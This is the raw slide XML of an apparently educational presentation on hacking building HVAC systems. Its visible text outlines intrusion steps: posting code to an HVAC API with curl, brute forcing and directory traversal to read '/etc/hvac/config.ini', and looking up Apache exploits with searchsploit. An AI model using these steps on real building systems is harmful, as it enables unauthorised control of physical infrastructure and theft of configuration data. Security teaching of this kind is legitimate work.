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notesMasterIdLst>
    <p:notesMasterId r:id="rId19"/>
  </p:notesMasterIdLst>
  <p:sldSz cx="14630400" cy="8229600"/>
  <p:notesSz cx="8229600" cy="14630400"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Montserrat Black"/>
      <p:regular r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat Black"/>
      <p:regular r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>
      <p:regular r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2.fntdata"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.fntdata"/><Relationship Id="rId27"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8ECE4"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="14630400" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8ECE4"/>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slideLayout" Target="../slideLayouts/slideLayout17.xml"/><Relationship Id="rId6"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hyperlink" Target="https://www.openai.com/" TargetMode="External"/><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36376"/>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Hacking Climate Control Systems in Buildings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4194096"/>
            <a:ext cx="7556421" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Step-by-Step Exploitation and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="481214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6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5430203"/>
            <a:ext cx="7556421" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>By: Dennis Freyman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897969"/>
            <a:ext cx="917317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3a. Exploit Web Vulnerabilities:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="1946910"/>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5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878860" y="1989415"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="2024777"/>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Application:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="2515195"/>
            <a:ext cx="864810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Would be applicable assuming you got in through some kind of service/web vuln. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3694628"/>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9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878860" y="3737134"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="3772495"/>
            <a:ext cx="4361378"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If you got in a HVAC service:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="4262914"/>
            <a:ext cx="8648105"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Test API commands:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="4880967"/>
            <a:ext cx="8648105" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519595" y="4880967"/>
            <a:ext cx="8670727" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1746409" y="5050988"/>
            <a:ext cx="8217098"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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>curl -X POST -d "print(hi)" http://192.168.0.10/api/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6037540"/>
            <a:ext cx="510302" cy="510302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1792"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8ECE4"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="151617"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="bl" rotWithShape="0" blurRad="0" dist="20320" dir="2700000">
              <a:srgbClr val="151617">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878860" y="6080046"/>
            <a:ext cx="340162" cy="425291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2650" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="6115407"/>
            <a:ext cx="5670828"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If you got into some other web thing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530906" y="6605826"/>
            <a:ext cx="8648105"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Try and find further web vulnerabilities (which tend to be very common especially internally) to control HVAC</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025962"/>
            <a:ext cx="567059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3b. Brute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="218836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Assuming you got in through some kind of credential related method, attempt to get further into the service. This can be done via more brute force or often simple directory traversal commands. F.e.:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2978348" y="3169325"/>
            <a:ext cx="2152055" cy="1306949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894892" y="3785354"/>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151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357217" y="3471267"/>
            <a:ext cx="2023110" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5345906" y="3471267"/>
            <a:ext cx="2045732" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5572720" y="3641288"/>
            <a:ext cx="1592104"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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ls -la /etc/hvac/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187077" y="4489371"/>
            <a:ext cx="8592860" cy="15240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 60000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="151617"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902381" y="4532948"/>
            <a:ext cx="4304109" cy="1306949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894892" y="4987052"/>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151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6433304" y="4834890"/>
            <a:ext cx="2811780" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1301"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421993" y="4834890"/>
            <a:ext cx="2834402" cy="702945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648807" y="5004911"/>
            <a:ext cx="2380774"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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>cat /etc/hvac/config.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263164" y="5852993"/>
            <a:ext cx="7516773" cy="15240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 60000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="151617"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 2" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="826294" y="5896570"/>
            <a:ext cx="6456164" cy="1306949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894773" y="6350675"/>
            <a:ext cx="318968" cy="398621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509272" y="6123384"/>
            <a:ext cx="485418"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etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509272" y="6613803"/>
            <a:ext cx="485418"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64356" y="443389"/>
            <a:ext cx="6346150" cy="503873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3950"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3c. Use Known Vulnerabilities:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564356" y="1269683"/>
            <a:ext cx="13501688" cy="257889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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As mentioned before, if services are running on the network they will sometimes be outdated. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="564356" y="1708904"/>
            <a:ext cx="6650117" cy="4110038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564356" y="5980152"/>
            <a:ext cx="3089196" cy="251936"/>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Check for software exploits:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564356" y="6413421"/>
            <a:ext cx="6650117" cy="499586"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1830"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556379" y="6413421"/>
            <a:ext cx="6666071" cy="499586"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717590" y="6534269"/>
            <a:ext cx="6343650" cy="257889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>searchsploit Apache 2.4.41</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564356" y="7094339"/>
            <a:ext cx="6650117" cy="257889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Uses searchsploit to look for known vulnerabilities of that version of apache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415927" y="1708904"/>
            <a:ext cx="6650117" cy="4110038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
